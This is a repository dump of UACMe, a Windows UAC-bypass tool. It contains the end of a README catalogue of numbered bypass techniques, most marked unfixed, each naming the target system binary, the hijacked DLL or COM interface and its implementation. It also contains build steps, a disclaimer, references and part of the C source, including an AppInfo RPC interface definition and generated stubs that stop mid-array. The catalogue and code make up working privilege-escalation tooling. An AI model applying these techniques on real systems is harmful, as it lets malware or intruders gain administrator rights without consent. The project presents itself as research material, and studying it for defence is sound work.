* Implementation: ucmShellRegModMethod
* Works from: Windows 10 RS4 (17134)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.6
63. Author: Arush Agarampur
* Type: Dll Hijack
* Method: ISecurityEditor
* Target(s): Native Image Cache elements
* Component(s): Attacker defined
* Implementation: ucmNICPoisonMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.2.7
64. Author: Arush Agarampur
* Type: Elevated COM interface
* Method: IIEAxiAdminInstaller, IIEAxiInstaller2, IFileOperation
* Target(s): IE add-on install cache
* Component(s): Attacker defined
* Implementation: ucmIeAddOnInstallMethod
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.1
65. Author: Arush Agarampur
* Type: Elevated COM interface
* Method: IWscAdmin
* Target(s): Shell Protocol Hijack
* Component(s): Attacker defined
* Implementation: ucmWscActionProtocolMethod
* Works from: Windows 7 (7600)
* Fixed in: Windows 11 24H2 (26100)
* How: Side effect of Windows changes
* Code status: added in v3.5.2
66. Author: Arush Agarampur
* Type: Elevated COM interface
* Method: IFwCplLua, Shell Protocol Hijack
* Target(s): Shell protocol registry entry and environment variables
* Component(s): Attacker defined
* Implementation: ucmFwCplLuaMethod2
* Works from: Windows 7 (7600)
* Fixed in: Windows 11 24H2 (26100)
* How: Side effect of Windows changes
* Code status: added in v3.5.3
67. Author: Arush Agarampur
* Type: Shell API
* Method: Shell Protocol Hijack
* Target(s): \system32\fodhelper.exe
* Component(s): Attacker defined
* Implementation: ucmMsSettingsProtocolMethod
* Works from: Windows 10 TH1 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.4
68. Author: Arush Agarampur
* Type: Shell API
* Method: Shell Protocol Hijack
* Target(s): \system32\wsreset.exe
* Component(s): Attacker defined
* Implementation: ucmMsStoreProtocolMethod
* Works from: Windows 10 RS5 (17763)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.5
69. Author: Arush Agarampur
* Type: Shell API
* Method: Environment variables expansion, Dll Hijack
* Target(s): \system32\taskhostw.exe
* Component(s): pcadm.dll
* Implementation: ucmPcaMethod
* Works from: Windows 7 (7600)
* AlwaysNotify compatible
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.6
70. Author: V3ded
* Type: Shell API
* Method: Registry key manipulation
* Target(s): \system32\fodhelper.exe, \system32\computerdefaults.exe
* Component(s): Attacker defined
* Implementation: ucmShellRegModMethod3
* Works from: Windows 10 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.7
71. Author: Arush Agarampur
* Type: Dll Hijack
* Method: ISecurityEditor
* Target(s): Native Image Cache elements
* Component(s): Attacker defined
* Implementation: ucmNICPoisonMethod2
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.8
72. Author: Emeric Nasi
* Type: Dll Hijack
* Method: Dll path search abuse
* Target(s): \syswow64\msdt.exe, \system32\sdiagnhost.exe
* Component(s): BluetoothDiagnosticUtil.dll
* Implementation: ucmMsdtMethod
* Works from: Windows 10 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.9
73. Author: orange_8361 and antonioCoco
* Type: Shell API
* Method: .NET deserialization
* Target(s): \system32\mmc.exe EventVwr.msc
* Component(s): Attacker defined
* Implementation: ucmDotNetSerialMethod
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.0
74. Author: zcgonvh
* Type: Elevated COM interface
* Method: IElevatedFactoryServer
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmVFServerTaskSchedMethod
* Works from: Windows 8.1 (9600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.1
75. Author: zcgonvh derivative by Wh04m1001
* Type: Elevated COM interface
* Method: IDiagnosticProfile
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmVFServerDiagProfileMethod
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.2
76. Author: HackerHouse
* Type: Dll Hijack
* Method: Dll path search abuse, Registry key manipulation
* Target(s): \syswow64\iscsicpl.exe
* Component(s): iscsiexe.dll
* Implementation: ucmIscsiCplMethod
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.3
77. Author: Arush Agarampur
* Type: Dll Hijack
* Method: IFileOperation
* Target(s): \system32\mmc.exe
* Component(s): atl.dll
* Implementation: ucmAtlHijackMethod
* Works from: Windows 7 RTM (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.4
78. Author: antonioCoco
* Type: Impersonation
* Method: SSPI Datagram
* Target(s): Attacker defined
* Component(s): Attacker defined
* Implementation: ucmSspiDatagramMethod
* Works from: Windows 7 RTM (7600)
* AlwaysNotify compatible
* Fixed in: Windows 10 (19041), a part of patch, 2024? year
* How: Side effect of Windows changes
* Code status: added in v3.6.5
79. Author: James Forshaw and Stefan Kanthak
* Type: GUI Hack
* Method: UIPI bypass with token modification
* Target(s): \system32\osk.exe, \system32\mmc.exe
* Component(s): Attacker defined
* Implementation: ucmTokenModUIAccessMethod2
* Works from: Windows 7 (7600)
* Fixed in: Windows 10 RS5 (17763), a part of patch, 2024 year
* How: When integrity level of an UIAccess token is lowered, the UIAccess property is removed
* Code status: added in v3.6.6
80. Author: R41N3RZUF477
* Type: Shell API
* Method: Environment variables expansion, Dll Hijack
* Target(s): \system32\taskhostw.exe
* Component(s): PerformanceTraceHandler.dll
* Implementation: ucmRequestTraceMethod
* Works from: Windows 11 (26100)
* AlwaysNotify compatible
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.7
81. Author: R41N3RZUF477
* Type: Shell API
* Method: Environment variables expansion, Dll Hijack, UIPI bypass
* Target(s): \system32\QuickAssist.exe
* Component(s): EmbeddedBrowserWebView.dll
* Implementation: ucmQuickAssistMethod
* Works from: Windows 10 (19041)
* AlwaysNotify compatible
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.8
**Important Notes:**
* Method 30, 63 and later are implemented only in x64 version
* Method 30 requires x64 because it exploits WOW64 subsystem feature
* Method 55 is included primarily for educational purposes and may not be reliable
* Method 78 requires that the current user account password is not blank
## Warning
⚠️ **Important Security and Usage Information**:
* This tool demonstrates **only publicly known UAC bypass methods** used by malware. It reimplements some techniques in different ways to improve upon original concepts.
* **Not intended for antivirus testing** and not guaranteed to work in environments with aggressive security software. Use with active antivirus at your own risk.
* Many antivirus solutions may flag this tool as a "HackTool" - this is expected behavior due to its capabilities.
* **Clean up after usage**: If running on a production system, ensure you remove all program artifacts afterward. See source code for details about files dropped to system folders.
* Most methods were developed primarily for x64 systems. While many can work on x86-32 with minor adjustments, 32-bit support is not a focus of this project.
* For an official Microsoft explanation on why UAC bypasses still exist, see: [Microsoft's stance on UAC](https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105)
# Windows 10 support and testing policy
* UACMe is tested only with LSTB/LTSC variants (1607/1809) and the current RTM-1 versions
* For example: if the current version is 2004, it will be tested on 2004 (19041) and the previous 1909 (18363)
* Insider builds are not supported as methods may be fixed in preview releases
# Protection Measures
The most effective protection against UAC bypass techniques is using an account without administrative privileges.
# Build instructions
UACMe is written in C and requires Microsoft Visual Studio 2019 or later to build from source.
### Prerequisites
* **IDE**: Microsoft Visual Studio 2019 or 2022
* **SDK Requirements**:
* Windows 8.1 or Windows 10 SDK (tested with 19041 version)
* NET Framework SDK (tested with 4.8 version)
### Build Steps
1. **Configure Platform ToolSet** (Project->Properties->General):
* For Visual Studio 2019: Select v142
* For Visual Studio 2022: Select v143
2. **Set Target Platform Version** (Project->Properties->General):
* For v140: Select 8.1 (Windows 8.1 SDK must be installed)
* For v141 and above: Select 10
3. **Build Process**:
* Compile payload units
* Compile Naka module
* Encrypt all payload units using Naka module
* Generate secret blobs for these units using Naka module
* Move compiled units and secret blobs to the Akagi\Bin directory
* Rebuild Akagi
> **Note**: Compiled binaries are not provided and will never be provided. This serves as a barrier against malicious usage and helps maintain the educational purpose of this project.
## Legal Disclaimer
* This tool is provided for **educational and research purposes only**
* We do not take any responsibility for this tool being used in malicious activities
* We have no affiliation with any "security company" using this code for commercial activities
* This GitHub repository (hfiref0x/UACME) is the only genuine source for UACMe code
# Support
If you find this project interesting, you can buy me a coffee
BTC (Bitcoin): bc1qzkvtpa0053cagf35dqmpvv9k8hyrwl7krwdz84q39mcpy68y6tmqsju0g4
# References
* Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
* Malicious Application Compatibility Shims, https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf
* Junfeng Zhang from WinSxS dev team blog, https://blogs.msdn.microsoft.com/junfeng/
* Beyond good ol' Run key, series of articles, http://www.hexacorn.com/blog
* KernelMode.Info UACMe thread, https://www.kernelmode.info/forum/viewtopicf985.html?f=11&t=3643
* Command Injection/Elevation - Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited
* "Fileless" UAC Bypass Using eventvwr.exe and Registry Hijacking, https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
* Bypassing UAC on Windows 10 using Disk Cleanup, https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
* Using IARPUninstallStringLauncher COM interface to bypass UAC, http://www.freebuf.com/articles/system/116611.html
* Bypassing UAC using App Paths, https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
* "Fileless" UAC Bypass using sdclt.exe, https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
* UAC Bypass or story about three escalations, https://habrahabr.ru/company/pm/blog/328008/
* Exploiting Environment Variables in Scheduled Tasks for UAC Bypass, https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html
* First entry: Welcome and fileless UAC bypass, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
* Reading Your Way Around UAC in 3 parts:
1. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html
2. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html
3. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html
* Research on CMSTP.exe, https://msitpros.com/?p=3960
* UAC bypass via elevated .NET applications, https://offsec.provadys.com/UAC-bypass-dotnet.html
* UAC Bypass by Mocking Trusted Directories, https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
* Yet another sdclt UAC bypass, http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass
* UAC Bypass via SystemPropertiesAdvanced.exe and DLL Hijacking, https://egre55.github.io/system-properties-uac-bypass/
* Accessing Access Tokens for UIAccess, https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.html
* Fileless UAC Bypass in Windows Store Binary, https://www.activecyber.us/1/post/2019/03/windows-uac-bypass.html
* Calling Local Windows RPC Servers from .NET, https://googleprojectzero.blogspot.com/2019/12/calling-local-windows-rpc-servers-from.html
* Microsoft Windows 10 UAC bypass local privilege escalation exploit, https://packetstormsecurity.com/files/155927/Microsoft-Windows-10-Local-Privilege-Escalation.html
* UACMe 3.5, WD and the ways of mitigation, https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html
* UAC bypasses from COMAutoApprovalList, https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
* Utilizing Programmatic Identifiers (ProgIDs) for UAC Bypasses, https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses
* MSDT DLL Hijack UAC bypass, https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass
* UAC bypass through .Net Deserialization vulnerability in eventvwr.exe, https://twitter.com/orange_8361/status/1518970259868626944
* Advanced Windows Task Scheduler Playbook - Part.2 from COM to UAC bypass and get SYSTEM directly, http://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.2_from_COM_to_UAC_bypass_and_get_SYSTEM_dirtectly.html
* Bypassing UAC with SSPI Datagram Contexts, https://splintercod3.blogspot.com/p/bypassing-uac-with-sspi-datagram.html
* Mitigate some Exploits for Windows’® UAC, https://skanthak.hier-im-netz.de/uacamole.html
# Authors
(c) 2014 - 2026 UACMe Project
================================================
FILE: Source/Akagi/aic.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2026
*
* TITLE: AIC.C
*
* VERSION: 3.69
*
* DATE: 12 Feb 2026
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#ifdef _WIN64
#include "appinfo/x64/appinfo64.h"
#else
#include "appinfo/x86-32/appinfo32.h"
#endif
/*
* AicpAsyncInitializeHandle
*
* Purpose:
*
* Init RPC_ASYNC_STATE structure.
*
*/
RPC_STATUS AicpAsyncInitializeHandle(
_Inout_ RPC_ASYNC_STATE* AsyncState)
{
RPC_STATUS status;
status = RpcAsyncInitializeHandle(AsyncState, sizeof(RPC_ASYNC_STATE));
if (status == RPC_S_OK) {
AsyncState->NotificationType = RpcNotificationTypeEvent;
AsyncState->u.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (AsyncState->u.hEvent == NULL)
status = GetLastError();
}
return status;
}
/*
* AicpAsyncCloseHandle
*
* Purpose:
*
* Close RPC_ASYNC_STATE notification event.
*
*/
VOID AicpAsyncCloseHandle(
_Inout_ RPC_ASYNC_STATE* AsyncState)
{
if (AsyncState->u.hEvent) {
CloseHandle(AsyncState->u.hEvent);
AsyncState->u.hEvent = NULL;
}
}
/*
* AicLaunchAdminProcess
*
* Purpose:
*
* Create process by talking to APPINFO via RPC.
*
*/
BOOLEAN AicLaunchAdminProcess(
_In_opt_ LPWSTR ExecutablePath,
_In_opt_ LPWSTR CommandLine,
_In_ DWORD StartFlags,
_In_ DWORD CreationFlags,
_In_ LPWSTR CurrentDirectory,
_In_ LPWSTR WindowStation,
_In_opt_ HWND hWnd,
_In_ DWORD Timeout,
_In_ DWORD ShowFlags,
_Out_ PROCESS_INFORMATION* ProcessInformation
)
{
BOOLEAN bResult = FALSE;
RPC_BINDING_HANDLE rpcHandle;
RPC_ASYNC_STATE asyncState;
APP_PROCESS_INFORMATION procInfo;
APP_STARTUP_INFO appStartup;
RPC_STATUS status;
VOID* Reply = NULL;
LONG elevationType = 0;
if (ProcessInformation) {
ProcessInformation->hProcess = NULL;
ProcessInformation->hThread = NULL;
ProcessInformation->dwProcessId = 0;
ProcessInformation->dwThreadId = 0;
}
RtlSecureZeroMemory(&procInfo, sizeof(procInfo));
RtlSecureZeroMemory(&appStartup, sizeof(appStartup));
appStartup.dwFlags = STARTF_USESHOWWINDOW;
appStartup.wShowWindow = (SHORT)ShowFlags;
RtlSecureZeroMemory(&asyncState, sizeof(RPC_ASYNC_STATE));
if ((supCreateBindingHandle(APPINFO_RPC, &rpcHandle) == RPC_S_OK) &&
(AicpAsyncInitializeHandle(&asyncState) == RPC_S_OK))
{
__try {
RAiLaunchAdminProcess(&asyncState,
rpcHandle,
ExecutablePath,
CommandLine,
StartFlags,
CreationFlags,
CurrentDirectory,
WindowStation,
&appStartup,
(ULONG_PTR)hWnd,
Timeout,
&procInfo,
&elevationType);
if (WaitForSingleObject(asyncState.u.hEvent, INFINITE) == WAIT_FAILED)
{
RpcRaiseException(-1);
}
status = RpcAsyncCompleteCall(&asyncState, &Reply);
if (status == 0 && Reply == NULL) {
if (ProcessInformation) {
ProcessInformation->hProcess = (HANDLE)procInfo.ProcessHandle;
ProcessInformation->hThread = (HANDLE)procInfo.ThreadHandle;
ProcessInformation->dwProcessId = (DWORD)procInfo.ProcessId;
ProcessInformation->dwThreadId = (DWORD)procInfo.ThreadId;
}
bResult = TRUE;
}
AicpAsyncCloseHandle(&asyncState);
}
__except (EXCEPTION_EXECUTE_HANDLER) {
AicpAsyncCloseHandle(&asyncState);
RpcBindingFree(&rpcHandle);
SetLastError(RpcExceptionCode());
return FALSE;
}
RpcBindingFree(&rpcHandle);
}
return bResult;
}
================================================
FILE: Source/Akagi/aic.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2020
*
* TITLE: AIC.H
*
* VERSION: 3.23
*
* DATE: 17 Dec 2019
*
* Common header file for the AppInfo routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef ULONG ELEVATION_REASON;
BOOLEAN AicLaunchAdminProcess(
_In_opt_ LPWSTR ExecutablePath,
_In_opt_ LPWSTR CommandLine,
_In_ DWORD StartFlags,
_In_ DWORD CreationFlags,
_In_ LPWSTR CurrentDirectory,
_In_ LPWSTR WindowStation,
_In_opt_ HWND hWnd,
_In_ DWORD Timeout,
_In_ DWORD ShowFlags,
_Out_ PROCESS_INFORMATION* ProcessInformation);
================================================
FILE: Source/Akagi/akagi.manifest
================================================
Akagi was an aircraft carrier of the Imperial Japanese Navy (IJN), named after Mount Akagi in present-day Gunma Prefecture.
================================================
FILE: Source/Akagi/appinfo/appinfo.acf
================================================
interface LaunchAdminProcess
{
[async] RAiLaunchAdminProcess();
}
================================================
FILE: Source/Akagi/appinfo/appinfo.idl
================================================
import "oaidl.idl";
import "ocidl.idl";
[
uuid(201ef99a-7fa0-444c-9399-19ba84f12a1a),
version(1.0),
]
interface LaunchAdminProcess
{
typedef struct _MONITOR_POINT {
long MonitorLeft;
long MonitorRight;
} MONITOR_POINT;
typedef struct _APP_STARTUP_INFO {
wchar_t* lpszTitle;
long dwX;
long dwY;
long dwXSize;
long dwYSize;
long dwXCountChars;
long dwYCountChars;
long dwFillAttribute;
long dwFlags;
short wShowWindow;
struct _MONITOR_POINT MonitorPoint;
} APP_STARTUP_INFO;
typedef struct _APP_PROCESS_INFORMATION {
unsigned __int3264 ProcessHandle;
unsigned __int3264 ThreadHandle;
long ProcessId;
long ThreadId;
} APP_PROCESS_INFORMATION;
long RAiLaunchAdminProcess(
handle_t hBinding,
[in][unique][string] wchar_t* ExecutablePath,
[in][unique][string] wchar_t* CommandLine,
[in]long StartFlags,
[in]long CreationFlags,
[in][string] wchar_t* CurrentDirectory,
[in][string] wchar_t* WindowStation,
[in]struct _APP_STARTUP_INFO* StartupInfo,
[in]unsigned __int3264 hWnd,
[in]long Timeout,
[out]struct _APP_PROCESS_INFORMATION* ProcessInformation,
[out]long* ElevationType);
}
================================================
FILE: Source/Akagi/appinfo/x64/appinfo64.c
================================================
/* this ALWAYS GENERATED file contains the RPC client stubs */
/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for appinfo.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if defined(_M_AMD64)
#pragma warning( disable: 4049 ) /* more than 64k source lines */
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning( disable: 4211 ) /* redefine extern to static */
#pragma warning( disable: 4232 ) /* dllimport identity*/
#pragma warning( disable: 4024 ) /* array to pointer mapping*/
#include "appinfo64.h"
#define TYPE_FORMAT_STRING_SIZE 75
#define PROC_FORMAT_STRING_SIZE 103
#define EXPR_FORMAT_STRING_SIZE 1
#define TRANSMIT_AS_TABLE_SIZE 0
#define WIRE_MARSHAL_TABLE_SIZE 0
typedef struct _appinfo_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];
} appinfo_MIDL_TYPE_FORMAT_STRING;
typedef struct _appinfo_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[ PROC_FORMAT_STRING_SIZE ];
} appinfo_MIDL_PROC_FORMAT_STRING;
typedef struct _appinfo_MIDL_EXPR_FORMAT_STRING
{
long Pad;
unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];
} appinfo_MIDL_EXPR_FORMAT_STRING;
static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax =
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
extern const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString;
extern const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString;
extern const appinfo_MIDL_EXPR_FORMAT_STRING appinfo__MIDL_ExprFormatString;
#define GENERIC_BINDING_TABLE_SIZE 0
/* Standard interface: LaunchAdminProcess, ver. 1.0,
GUID={0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}} */
static const RPC_CLIENT_INTERFACE LaunchAdminProcess___RpcClientInterface =
{
sizeof(RPC_CLIENT_INTERFACE),
{{0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}},{1,0}},
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
0,
0,
0,
0,
0,
0x00000000
};
RPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec = (RPC_IF_HANDLE)& LaunchAdminProcess___RpcClientInterface;
extern const MIDL_STUB_DESC LaunchAdminProcess_StubDesc;
static RPC_BINDING_HANDLE LaunchAdminProcess__MIDL_AutoBindHandle;
/* [async] */ void RAiLaunchAdminProcess(
/* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle,
handle_t hBinding,
/* [string][unique][in] */ wchar_t *ExecutablePath,
/* [string][unique][in] */ wchar_t *CommandLine,
/* [in] */ long StartFlags,
/* [in] */ long CreationFlags,
/* [string][in] */ wchar_t *CurrentDirectory,
/* [string][in] */ wchar_t *WindowStation,
/* [in] */ struct _APP_STARTUP_INFO *StartupInfo,
/* [in] */ unsigned __int3264 hWnd,
/* [in] */ long Timeout,
/* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation,
/* [out] */ long *ElevationType)
{
NdrAsyncClientCall(
( PMIDL_STUB_DESC )&LaunchAdminProcess_StubDesc,
(PFORMAT_STRING) &appinfo__MIDL_ProcFormatString.Format[0],
RAiLaunchAdminProcess_AsyncHandle,
hBinding,
ExecutablePath,
CommandLine,
StartFlags,
CreationFlags,
CurrentDirectory,
WindowStation,
StartupInfo,
hWnd,
Timeout,
ProcessInformation,
ElevationType);
}
#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
#endif
static const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString =
{
0,
{
/* Procedure RAiLaunchAdminProcess */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x0 ), /* 0 */
/* 8 */ NdrFcShort( 0x70 ), /* X64 Stack size/offset = 112 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 14 */ NdrFcShort( 0x20 ), /* 32 */
/* 16 */ NdrFcShort( 0x24 ), /* 36 */
/* 18 */ 0xc7, /* Oi2 Flags: srv must size, clt must size, has return, has ext, has async handle */
0xc, /* 12 */
/* 20 */ 0xa, /* 10 */
0x1, /* Ext Flags: new corr desc, */
/* 22 */ NdrFcShort( 0x0 ), /* 0 */
/* 24 */ NdrFcShort( 0x0 ), /* 0 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* 28 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter ExecutablePath */
/* 30 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */
/* 32 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 34 */ NdrFcShort( 0x2 ), /* Type Offset=2 */
/* Parameter CommandLine */
/* 36 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */
/* 38 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 40 */ NdrFcShort( 0x2 ), /* Type Offset=2 */
/* Parameter StartFlags */
/* 42 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 44 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */
/* 46 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter CreationFlags */
/* 48 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 50 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */
/* 52 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter CurrentDirectory */
/* 54 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 56 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */
/* 58 */ NdrFcShort( 0x8 ), /* Type Offset=8 */
/* Parameter WindowStation */
/* 60 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 62 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */
/* 64 */ NdrFcShort( 0x8 ), /* Type Offset=8 */
/* Parameter StartupInfo */
/* 66 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 68 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */
/* 70 */ NdrFcShort( 0x16 ), /* Type Offset=22 */
/* Parameter hWnd */
/* 72 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 74 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */
/* 76 */ 0xb9, /* FC_UINT3264 */
0x0, /* 0 */
/* Parameter Timeout */
/* 78 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 80 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */
/* 82 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter ProcessInformation */
/* 84 */ NdrFcShort( 0x6113 ), /* Flags: must size, must free, out, simple ref, srv alloc size=24 */
/* 86 */ NdrFcShort( 0x58 ), /* X64 Stack size/offset = 88 */
/* 88 */ NdrFcShort( 0x38 ), /* Type Offset=56 */
/* Parameter ElevationType */
/* 90 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */
/* 92 */ NdrFcShort( 0x60 ), /* X64 Stack size/offset = 96 */
/* 94 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Return value */
/* 96 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 98 */ NdrFcShort( 0x68 ), /* X64 Stack size/offset = 104 */
/* 100 */ 0x8, /* FC_LONG */
0x0, /* 0 */
0x0
}
};
static const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString =
{
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x12, 0x8, /* FC_UP [simple_pointer] */
/* 4 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */
/* 6 */
0x11, 0x8, /* FC_RP [simple_pointer] */
/* 8 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */
/* 10 */
0x11, 0x0, /* FC_RP */
/* 12 */ NdrFcShort( 0xa ), /* Offset= 10 (22) */
/* 14 */
0x15, /* FC_STRUCT */
0x3, /* 3 */
/* 16 */ NdrFcShort( 0x8 ), /* 8 */
/* 18 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 20 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 22 */
0x1a, /* FC_BOGUS_STRUCT */
0x3, /* 3 */
/* 24 */ NdrFcShort( 0x38 ), /* 56 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* 28 */ NdrFcShort( 0x14 ), /* Offset= 20 (48) */
/* 30 */ 0x36, /* FC_POINTER */
0x8, /* FC_LONG */
/* 32 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 34 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 36 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 38 */ 0x8, /* FC_LONG */
0x6, /* FC_SHORT */
/* 40 */ 0x3e, /* FC_STRUCTPAD2 */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 42 */ 0x0, /* 0 */
NdrFcShort( 0xffe3 ), /* Offset= -29 (14) */
0x40, /* FC_STRUCTPAD4 */
/* 46 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 48 */
0x12, 0x8, /* FC_UP [simple_pointer] */
/* 50 */ 0x5, /* FC_WCHAR */
0x5c, /* FC_PAD */
/* 52 */
0x11, 0x4, /* FC_RP [alloced_on_stack] */
/* 54 */ NdrFcShort( 0x2 ), /* Offset= 2 (56) */
/* 56 */
